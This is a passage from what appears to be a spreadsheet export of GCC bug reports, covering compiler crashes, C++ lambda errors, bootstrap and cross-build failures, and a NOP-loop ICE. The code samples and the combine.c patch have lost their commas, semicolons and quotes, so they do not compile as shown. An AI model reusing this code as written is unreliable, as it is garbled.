Suse Linux 8.1 default Installtion
How-To-Repeat:
configure the sources under suse 8.1 then type make</t>
  </si>
  <si>
    <t>d.meisen</t>
  </si>
  <si>
    <t>GCC-24930</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Crash in combine</t>
  </si>
  <si>
    <t>(in mainline)  compile the below with -O.  A patch follows which I'm fairly sure is right but I will not be able to run a test cycle until Nov 30.  I'll do it then if nobody else has.
$ld/gcc/gccs.fsf.obj/gcc/xgcc -B $ld/gcc/gccs.fsf.obj/gcc/ -O 4347034.c
4347034.c: In function 'main':
4347034.c:5: warning: incompatible implicit declaration of built-in function 'printf'
4347034.c:17: warning: incompatible implicit declaration of built-in function 'printf'
4347034.c:19: internal compiler error: in do_SUBST at combine.c:470
int
main(int argc char** argv)
{
  if(argc == 1) {
    printf(Please provide a two char argument\n)
    return 0
  }
  const char *buf = argv[1]
  unsigned int data = (((unsigned int) buf[0]) &lt;&lt; 8) + (unsigned int) buf[1]
  if (data &amp; 0x8000) {
    data 
    data ^= 0x7fff 
    data += 1 
    data *= -1 
  }
  printf(Data = %d\n (int) data)
  return 0
}
Index: combine.c
===================================================================
--- combine.c   (revision 107129)
+++ combine.c   (working copy)
@@ -334613 +334615 @@
          rtx dest = XEXP (SET_DEST (x) 0)
          enum machine_mode mode = GET_MODE (dest)
          unsigned HOST_WIDE_INT mask = ((HOST_WIDE_INT) 1 &lt;&lt; len) - 1
+         rtx or_mask
          if (BITS_BIG_ENDIAN)
            pos = GET_MODE_BITSIZE (mode) - len - pos
+         or_mask = GEN_INT (trunc_int_for_mode (src &lt;&lt; pos mode))
          if (src == mask)
            SUBST (SET_SRC (x)
-                  simplify_gen_binary (IOR mode dest GEN_INT (src &lt;&lt; pos)))
+                  simplify_gen_binary (IOR mode dest or_mask))
          else
            {
              rtx negmask = gen_int_mode (~(mask &lt;&lt; pos) mode)
@@ -33607 +33627 @@
                     simplify_gen_binary (IOR mode
                                          simplify_gen_binary (AND mode
                                                               dest negmask)
-                                         GEN_INT (src &lt;&lt; pos)))
+                                         or_mask))
            }
          SUBST (SET_DEST (x) dest)</t>
  </si>
  <si>
    <t>GCC-59944</t>
  </si>
  <si>
    <t>lambda in templated method body for method with default template value and lambda parameter causes error</t>
  </si>
  <si>
    <t>Created attachment 31953
compressed ii file
Take a class with a templated method let the template parameter have a default value and let the method have a std::function as only parameter with a lambda as default value for the parameter. Now inside this function use another independent lambda e.g. in the context of remove_if. Then g++ in all tested versions (4.8.1 4.8.2 4.9) throws several errors.
Please see for discussion code sample and explanation:
http://stackoverflow.com/questions/21353349/c11-g-strangeness-using-defaulted-template-lambda-remove-if
Regarding the details you request for bug reports here we go:
command line:
g++-4.9 -v -std=c++0x example3.cpp
(NOTE: example3.cpp contains the code shown in the stackoverflow link)
system info:
LinuxMint 16 (petra)
3.8.4 (Ubuntu 2013-12-05)
3.11.0-12-generic (#19-Ubuntu SMP Wed Oct 9 16:20:46 UTC 2013)
gcc version:
GNU C++ (Ubuntu 20130917-1ubuntu1) version 4.9.0 20130917 (experimental) [trunk revision 202647] (x86_64-linux-gnu)
compiled by GNU C version 4.9.0 20130917 (experimental) [trunk revision 202647] GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
gcc config options:
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 20130917-1ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-snap-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
ii-file:
see attachment
gcc complete verbose compiler output:
Using built-in specs.
COLLECT_GCC=g++-4.9
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 20130917-1ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-snap-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.0 20130917 (experimental) [trunk revision 202647] (Ubuntu 20130917-1ubuntu1) 
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.9.0/cc1plus -quiet -v -imultiarch x86_64-linux-gnu -D_GNU_SOURCE example3.cpp -quiet -dumpbase example3.cpp -mtune=generic -march=x86-64 -auxbase example3 -std=c++11 -version -o /tmp/ccYCvqsx.s
GNU C++ (Ubuntu 20130917-1ubuntu1) version 4.9.0 20130917 (experimental) [trunk revision 202647] (x86_64-linux-gnu)
	compiled by GNU C version 4.9.0 20130917 (experimental) [trunk revision 202647] GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/../../../../include/c++/4.9.0
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/../../../../include/c++/4.9.0/x86_64-linux-gnu
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/../../../../include/c++/4.9.0/backward
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/include
 /usr/local/include
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.9.0/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C++ (Ubuntu 20130917-1ubuntu1) version 4.9.0 20130917 (experimental) [trunk revision 202647] (x86_64-linux-gnu)
	compiled by GNU C version 4.9.0 20130917 (experimental) [trunk revision 202647] GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: c251dd37365dbb1c49e0a7e336cbf236
example3.cpp: In member function 'bool Foo::Moo(std::function) const':
example3.cpp:17:19: error: default argument for template parameter for class enclosing 'Foo::Moo(std::function) const::'
          [](char x){return true})
                   ^
example3.cpp: In function 'int main(int char**)':
example3.cpp:27:22: error: no matching function for call to 'Foo::Moo()'
  return myFoo-&gt;Moo()
                      ^
example3.cpp:27:22: note: candidate is:
example3.cpp:12:7: note: template bool Foo::Moo(std::function) const
  bool Moo(std::function f = [](){ return true }) const
       ^
example3.cpp:12:7: note:   template argument deduction/substitution failed:
example3.cpp:27:22: note:   couldn't deduce template parameter 'T'
  return myFoo-&gt;Moo()
                      ^</t>
  </si>
  <si>
    <t>balint</t>
  </si>
  <si>
    <t>GCC-41457</t>
  </si>
  <si>
    <t>[4.5 Regression] Bootstrap failure at revision 152100</t>
  </si>
  <si>
    <t>On powerpc-apple-darwin9 with the changes I will post on pr41405 bootstrap fails with:
...
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/sys-include    -c  -g -O2 -mdynamic-no-pic -gstrict-dwarf -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.5-work/gcc -I../../gcc-4.5-work/gcc/. -I../../gcc-4.5-work/gcc/../include -I../../gcc-4.5-work/gcc/../libcpp/include -I/opt/mpc/build//include  -I/sw/include  -I../../gcc-4.5-work/gcc/../libdecnumber -I../../gcc-4.5-work/gcc/../libdecnumber/dpd -I../libdecnumber -I/sw/include  -I/sw/include -DCLOOG_PPL_BACKEND   ../../gcc-4.5-work/gcc/c-format.c -o c-format.o
../../gcc-4.5-work/gcc/c-format.c: In function 'check_format_info_main':
../../gcc-4.5-work/gcc/c-format.c:2125:1: internal compiler error: in add_const_value_attribute at dwarf2out.c:13478
The file compiles if I remove '-gstrict-dwarf' and '-g' (currently building libjava at -m64 allow for a couple more hours for bootstrap to complete).
With the similar changes bootstrapping revision 152076 on i686-apple-darwin9.</t>
  </si>
  <si>
    <t>GCC-55149</t>
  </si>
  <si>
    <t>capturing VLA in lambda</t>
  </si>
  <si>
    <t>given that assigning a VLA to a pointer seems to be legal I was expecting to be able to capture a VLA in a lambda
in this code
cat pointerVLA.cc 
#include
 float c(int jint k)
 void bar(int * index int * ref int N int CN ) {
  float  r[N*CN]
  decltype(N) ii=0
  for (decltype(N) ir=0 ir!=N ++ir)
    for(decltype(N) cl=0cl!=CN++cl)
      r[ii++]=c(clref[ir])
#ifdef VLA
 std::sort(indexindex+N[rCN](int i int j) { return std::lexicographical_compare(r+i*CNr+i*CN+CNr+j*CNr+j*CN+CN)})
#else
  const float * rr = r
  std::sort(indexindex+N[rrCN](int i int j) { return std::lexicographical_compare(rr+i*CNrr+i*CN+CNrr+j*CNrr+j*CN+CN)})
#endif
}
compiles fine with the assignment rr = r
instead
gcc version 4.7.2 20120813 (prerelease) (GCC) 
c++ -O2 -std=c++11 -c pointerVLA.cc -DVLA
pointerVLA.cc: In function 'void bar(int* int* int int)':
pointerVLA.cc:10:121: error: no matching function for call to 'sort(int*&amp; int* bar(int* int* int int)::)'
pointerVLA.cc:10:121: note: candidates are:
In file included from /build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/algorithm:63:0
                 from pointerVLA.cc:1:
/build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/bits/stl_algo.h:5463:5: note: template void std::sort(_RAIter _RAIter)
/build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/bits/stl_algo.h:5463:5: note:   template argument deduction/substitution failed:
pointerVLA.cc:10:121: note:   candidate expects 2 arguments 3 provided
In file included from /build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/algorithm:63:0
                 from pointerVLA.cc:1:
/build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/bits/stl_algo.h:5499:5: note: template void std::sort(_RAIter _RAIter _Compare)
/build1/sw/osx108_amd64_gcc470/external/gcc/4.7.0/bin/../lib/gcc/x86_64-apple-darwin12.0.0/4.7.2/../../../../include/c++/4.7.2/bits/stl_algo.h:5499:5: note:   template argument deduction/substitution failed:
pointerVLA.cc:10:121: note:   variable-sized array type 'bar(int* int* int int)::' is not a valid template argument
gcc version 4.8.0 20121028 (experimental) [trunk revision 192889] (GCC) 
c++ -O2 -std=c++11 -c pointerVLA.cc -DVLA
pointerVLA.cc: In function â€˜void bar(int* int* int int)â€™:
pointerVLA.cc:10:31: internal compiler error: tree check: expected integer_cst have mult_expr in walk_subobject_offsets at cp/class.c:3516
  std::sort(indexindex+N[rCN](int i int j) { return std::lexicographical_compare(r+i*CNr+i*CN+CNr+j*CNr+j*CN+CN)})
                               ^
pointerVLA.cc:10:31: internal compiler error: Abort trap: 6
c++: internal compiler error: Abort trap: 6 (program cc1plus)
Abort trap: 6</t>
  </si>
  <si>
    <t>GCC-1612</t>
  </si>
  <si>
    <t>incorrect ambiguous overload message (template related)</t>
  </si>
  <si>
    <t>The compiler incorrectly tells me that there are ambiguous
default constructors when instantiating the vector class:
#include 
#include 
class my_t {
public:
    my_t() {}
private:
    std::vector v
}
int main() {}
[jeremy@luggage tmp]$ /usr/bin/g++ vector_test.cc
vector_test.cc: In constructor `my_t::my_t()':
vector_test.cc:6: call of overloaded `vector()' is ambiguous
/usr/local/include/g++-v3/bits/stl_vector.h:252: candidates are:
   std::vector::vector(unsigned int = 0) [with _Tp = int _Alloc =
   std::allocator]
/usr/local/include/g++-v3/bits/stl_vector.h:244:
   std::vector::vector(typename std::_Vector_base&lt;_Tp
   _Alloc&gt;::allocator_type&amp; = typename std::_Vector_base&lt;_Tp
   _Alloc&gt;::allocator_type()) [with _Tp = int _Alloc = std::allocator] 
However if I remove the #include  line or swap the
order of the two #includes above the problem disappears.
I don't think that this is a symptom of the STL classes that
were used more likely there is some type of side effect
when processing something in the  class that is
causing the problem.
I suspect that this is a template bug.
(Full preprocessor output attached -- sorry I couldn't
find an example that didn't include these two header
files).
Release:
gcc version 2.97 20010110 (experimental)
Environment:
i386-pc-linux-gnu
How-To-Repeat:
Run the program above.</t>
  </si>
  <si>
    <t>jeremy.barnes</t>
  </si>
  <si>
    <t>GCC-56771</t>
  </si>
  <si>
    <t>Integer Overflow? Building arm-rtems libgcc2</t>
  </si>
  <si>
    <t>This error occurs on some hosts. We suspect it occurs only on 32-bit hosts. It appears that some magic is occurring where a constant is too large.
Host: CentOS 6.4 32-bit
Host GCC: 4.4.7 20120313 (Red Hat 4.4.7-3)
Target: arm-rtems4.11
Component Versions:
gcc-4.7.2
gmp-5.0.5
mpc-0.8.2
mpfr-3.0.1
newlib-2.0.0
Configure command:
../gcc-4.7.2/configure \
--prefix=/home/joel/rtems-4.11-work/tools \
--bindir=/home/joel/rtems-4.11-work/tools/bin \
--exec_prefix=/home/joel/rtems-4.11-work/tools \
--includedir=/home/joel/rtems-4.11-work/tools/include \
--libdir=/home/joel/rtems-4.11-work/tools/lib \
--libexecdir=/home/joel/rtems-4.11-work/tools/libexec \
--mandir=/home/joel/rtems-4.11-work/tools/share/man \
--infodir=/home/joel/rtems-4.11-work/tools/share/info \
--datadir=/home/joel/rtems-4.11-work/tools/share \
--build=i686-linux-gnu --host=i686-linux-gnu \
--target=arm-rtems4.11 \
--disable-libstdcxx-pch \
--with-gnu-as --with-gnu-ld --verbose \
--with-newlib \
--with-system-zlib \
--disable-nls --without-included-gettext \
--disable-win32-registry \
--enable-version-specific-runtime-libs \
--disable-lto \
--enable-threads \
--disable-plugin \
--enable-newlib-io-c99-formats \
--enable-newlib-iconv \
--enable-obsolete \
--enable-languages=$languages
Failure output:
/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/./gcc/xgcc -B/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/./gcc/ -nostdinc -B/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/arm-rtems4.11/newlib/ -isystem /home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/arm-rtems4.11/newlib/targ-include -isystem /home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/gcc-4.7.2/newlib/libc/include -B/home/joel/rtems-4.11-work/tools/arm-rtems4.11/bin/ -B/home/joel/rtems-4.11-work/tools/arm-rtems4.11/lib/ -isystem /home/joel/rtems-4.11-work/tools/arm-rtems4.11/include -isystem /home/joel/rtems-4.11-work/tools/arm-rtems4.11/sys-include    -g -O2 -mthumb -O2 -I../../../../gcc-4.7.2/libgcc/../newlib/libc/sys/rtems/include -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fno-inline -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -fno-inline -I. -I. -I../../.././gcc -I../../../../gcc-4.7.2/libgcc -I../../../../gcc-4.7.2/libgcc/. -I../../../../gcc-4.7.2/libgcc/../gcc -I../../../../gcc-4.7.2/libgcc/../include  -DHAVE_CC_TLS  -o _muldi3.o -MT _muldi3.o -MD -MP -MF _muldi3.dep -DL_muldi3 -c ../../../../gcc-4.7.2/libgcc/libgcc2.c 
In file included from ../../../../gcc-4.7.2/libgcc/libgcc2.c:30:0:
../../../../gcc-4.7.2/libgcc/../gcc/coretypes.h:188:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/coretypes.h:195:1: warning: enumeration values exceed range of largest integer [enabled by default]
In file included from ../../.././gcc/options.h:6:0
                 from ../../.././gcc/tm.h:14
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:31:
../../../../gcc-4.7.2/libgcc/../gcc/flag-types.h:139:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/flag-types.h:147:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/flag-types.h:186:1: warning: enumeration values exceed range of largest integer [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/flag-types.h:190:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/flag-types.h:193:1: warning: enumeration values exceed range of largest integer [enabled by default]
In file included from ../../.././gcc/options.h:8:0
                 from ../../.././gcc/tm.h:14
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:31:
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm-opts.h:42:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm-opts.h:45:1: warning: enumeration values exceed range of largest integer [enabled by default]
In file included from ../../.././gcc/tm.h:14:0
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:31:
../../.././gcc/options.h:3626:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../.././gcc/options.h:4750:1: warning: enumeration values exceed range of largest integer [enabled by default]
In file included from ../../.././gcc/tm.h:15:0
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:31:
../../.././gcc/insn-constants.h:28:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../.././gcc/insn-constants.h:186:1: warning: enumeration values exceed range of largest integer [enabled by default]
../../.././gcc/insn-constants.h:191:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../.././gcc/insn-constants.h:213:1: warning: enumeration values exceed range of largest integer [enabled by default]
In file included from ../../.././gcc/tm.h:25:0
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:31:
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm.h:128:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm.h:335:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm.h:1403:7: error: size of array 'call_via' is too large
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm.h:1420:20: error: size of array 'thumb_call_via_label' is too large
../../../../gcc-4.7.2/libgcc/../gcc/config/arm/arm.h:1466:7: error: size of array 'aapcs_cprc_failed' is too large
In file included from ../../../../gcc-4.7.2/libgcc/libgcc2.c:58:0:
../../../../gcc-4.7.2/libgcc/libgcc2.h:499:22: error: size of array '__popcount_tab' is too large
../../../../gcc-4.7.2/libgcc/libgcc2.h:505:1: error: size of array '__clz_tab' is too large
In file included from ../../../../gcc-4.7.2/libgcc/libgcc2.h:507:0
                 from ../../../../gcc-4.7.2/libgcc/libgcc2.c:58:
../../../../gcc-4.7.2/libgcc/longlong.h:63:1: error: size of array '__clz_tab' is too large
../../../../gcc-4.7.2/libgcc/libgcc2.c: In function '__muldi3':
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: overflow in implicit constant conversion [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: right shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: left shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: right shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: right shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: left shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: right shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: left shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: left shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:22: warning: integer overflow in expression [-Woverflow]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: left shift count is negative [enabled by default]
../../../../gcc-4.7.2/libgcc/libgcc2.c:553:3: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
make[4]: *** [_muldi3.o] Error 1
make[4]: Leaving directory `/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/arm-rtems4.11/thumb/libgcc'
make[3]: *** [multi-do] Error 1
make[3]: Leaving directory `/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/arm-rtems4.11/libgcc'
make[2]: *** [all-multi] Error 2
make[2]: Leaving directory `/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build/arm-rtems4.11/libgcc'
make[1]: *** [all-target-libgcc] Error 2
make[1]: Leaving directory `/home/joel/rtems-4.11-work/rtems-source-builder/rtems/build/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2-1/arm-rtems4.11-gcc-4.7.2-newlib-2.0.0-1-4.7.2/build'</t>
  </si>
  <si>
    <t>GCC-56580</t>
  </si>
  <si>
    <t>Internal compiler error when trying to compile a sequence of NOPs inside a loop</t>
  </si>
  <si>
    <t>Created attachment 29629
The code that triggers the bug.
I am trying to do a silly thing: to produce a program that's bigger than my L1 Instruction cache but smaller than my L2 cache so the speed of the L2 cache can be measured.
My implementation is simple: I put a sequence of NOPs as inline assembly inside a for-loop. When I compile the code (see attachment) with -O2 or -O3 option gcc 4.7.2 throws out internal error.
Not that the bug is anywhere harmful. I can happily do without any optimization flags in this case. But I still think it's worth reporting as fixing it may be helpful to prevent other potential bugs. By the way my other versions of gcc (4.2.4 4.4.7 4.5.4) all work without any problems.
The code in the attachment uses 12288 NOPS inside the for-loop which loops 1000 times. Lowering the former to 10240 or lowering the latter to 500 both seem to eliminate the problem.
I am using Gentoo Linux. When I compile my gcc-4.7.2 using Portage I didn't set any optimization flags other than -O2 and -march=native. My machine is an i7 box.
Finally the following is the output of `gcc -v -save-temps -O2 GCC4.7-bug.c`:
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.7.2/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.7.2-r1/work/gcc-4.7.2/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.7.2 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --enable-obsolete --disable-werror --enable-secureplt --enable-multilib --with-multilib-list=m32m64 --enable-libmudflap --disable-libssp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/python --enable-checking=release --enable-libstdcxx-time --enable-languages=cc++javagofortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-targets=all --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.7.2-r1 p1.4 pie-0.5.5' --enable-plugin
Thread model: posix
gcc version 4.7.2 (Gentoo 4.7.2-r1 p1.4 pie-0.5.5) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O2' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.2/cc1 -E -quiet -v GCC4.7-bug.c -mtune=generic -march=x86-64 -O2 -fpch-preprocess -o GCC4.7-bug.i
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../../../x86_64-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O2' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.2/cc1 -fpreprocessed GCC4.7-bug.i -quiet -dumpbase GCC4.7-bug.c -mtune=generic -march=x86-64 -auxbase GCC4.7-bug -O2 -version -o GCC4.7-bug.s
GNU C (Gentoo 4.7.2-r1 p1.4 pie-0.5.5) version 4.7.2 (x86_64-pc-linux-gnu)
